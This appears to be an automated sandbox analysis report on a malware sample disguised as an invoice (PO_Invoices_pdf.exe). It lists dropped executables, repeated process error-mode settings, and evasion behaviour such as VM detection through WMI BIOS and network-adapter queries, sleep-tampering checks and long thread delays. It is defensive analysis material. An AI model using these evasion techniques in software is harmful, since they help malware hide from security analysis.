                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

                            Malware Analysis System Evasion:

                            barindex
                            Yara detected AntiVM_3Show sources
                            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5904, type: MEMORY
                            Found evasive API chain (trying to detect sleep duration tampering with parallel thread)Show sources
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeFunction Chain: threadResumed,threadDelayed,systemQueried,memAlloc,threadCreated,threadResumed,threadDelayed,threadDelayed,threadDelayed,systemQueried,threadDelayed,threadDelayed,systemQueried,processQueried,processQueried,systemQueried,threadDelayed,threadDelayed,threadDelayed,threadAPCQueued,threadDelayed,threadDelayed,threadDelayed,threadDelayed,threadDelayed
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeFunction Chain: threadDelayed,threadCreated,threadResumed,threadDelayed,threadDelayed,deviceIO,threadDelayed,threadDelayed,systemQueried,threadDelayed,threadDelayed,threadDelayed,threadDelayed,processSet,processSet,memAlloc,threadInformationSet,threadInformationSet,threadDelayed,systemQueried,threadDelayed,threadDelayed,threadDelayed,memAlloc,processSet
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeFunction Chain: memAlloc,systemQueried,systemQueried,threadCreated,threadResumed,threadDelayed,threadDelayed,threadDelayed,systemQueried,systemQueried,systemQueried,threadDelayed,threadDelayed,threadAPCQueued,threadDelayed,threadDelayed,threadDelayed,threadDelayed,threadDelayed,memAlloc,threadDelayed,memAlloc,memAlloc,memAlloc,memAlloc
                            Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                            Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeThread delayed: delay time: 300000
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeThread delayed: delay time: 180000
